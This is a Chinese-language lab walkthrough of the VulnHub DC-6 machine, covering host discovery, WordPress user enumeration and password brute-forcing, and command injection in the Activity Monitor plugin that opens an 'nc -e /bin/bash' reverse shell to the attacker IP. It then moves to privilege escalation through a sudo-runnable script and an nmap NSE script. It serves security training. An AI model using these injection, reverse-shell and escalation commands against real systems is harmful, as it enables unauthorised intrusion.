仅供个人娱乐
靶机信息
下载地址:https://download.vulnhub.com/dc/DC-6.zip
一、主机发现
nmap -sn 192.168.216.0/24
二、端口扫描
nmap -p 1-65535 -sV 192.168.216.132
三、漏洞查找和利用
80端口
打开网页
发现其中 web 服务被重定向到 http://wordy/ 修改host文件
echo "192.168.216.131 literally.vulnerable" >> /etc/hosts
或者在C:WindowsSystem32driversetc下的HOSTS文件中增加192.168.216.132 wordy
wpscan --urlhttp://wordy/ --enumerate 主题
wpscan --urlhttp://wordy/ --e u 用户
爆破出5个用户名admin,jens,graham,sarah,mark 将其作为字典爆破,直接用kali自带的/usr/share/wordlists/rockyou.txt ,我的字典复制到root目录下了
wpscan --url http://wordy/ -U 1.txt -P /root/rockyou.txt
爆破出密码 账号密码mark helpdesk01
目录
我们使用获得的密码登录http://wordy/wp-admin/
可以看到安装了activity_monitor插件
searchsploit activity monitor
修改脚本
开启一个简单的临时的web服务,去访问45274.html 来触发漏洞
python -m SimpleHTTPServer 8000
启动网页
多次测试修改,为了方便改为1.html
python -c 'import pty; pty.spawn("/bin/bash") #使用交互式命令行'
或者访问http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools输入ip,点击lookup,通过抓包修改ip参数的值为baidu.com | nc -e /bin/bash 192.168.216.128 4444
反弹成功
拿到shell开始信息收集
用户名和密码: graham GSo7isUM1D4,由于系统开启了ssh
使用sudo -l 查看目前用户可以执行的操作,发现我们可以运行jens用户下面的backups.sh。查看其内容是对web进行打包备份的
查看信息
执行这个脚本的时候会以jens用户来执行,方法:sudo -u jens /home/jens/backups.sh
可以让jens执行/bin/bash就直接得到了jens的shell
首先需要删除
graham@dc-6:~$ cd /home/jens
graham@dc-6:/home/jens$ ls
backups.sh
graham@dc-6:/home/jens$ cat /dev/null > backups.sh
graham@dc-6:/home/jens$ cat backups.sh
graham@dc-6:/home/jens$ ls
backups.sh
graham@dc-6:/home/jens$ cat backups.s
graham@dc-6:/home/jens$ echo "/bin/bash" >>/home/jens/backups.sh
graham@dc-6:/home/jens$ cat /home/jens/backups.sh
/bin/bash
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
jens@dc-6:~$ whoami
jens
已经是jens用户了,我们继续执行sudo -l 命令去查找我们可以进行的操作。
NOPASSWD: /usr/bin/nmap,jens用户可以在无需输入密码的情况下使用nmap,我们继续使用nmap去调用我们的脚本例如/bin/bash.
nmap提权
nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权(sudo提权)
利用过程:写入一个执行bash的nmap脚本,运行
echo "os.execute('/bin/bash')" > /tmp/root.nse
sudo nmap --script=/tmp/root.nse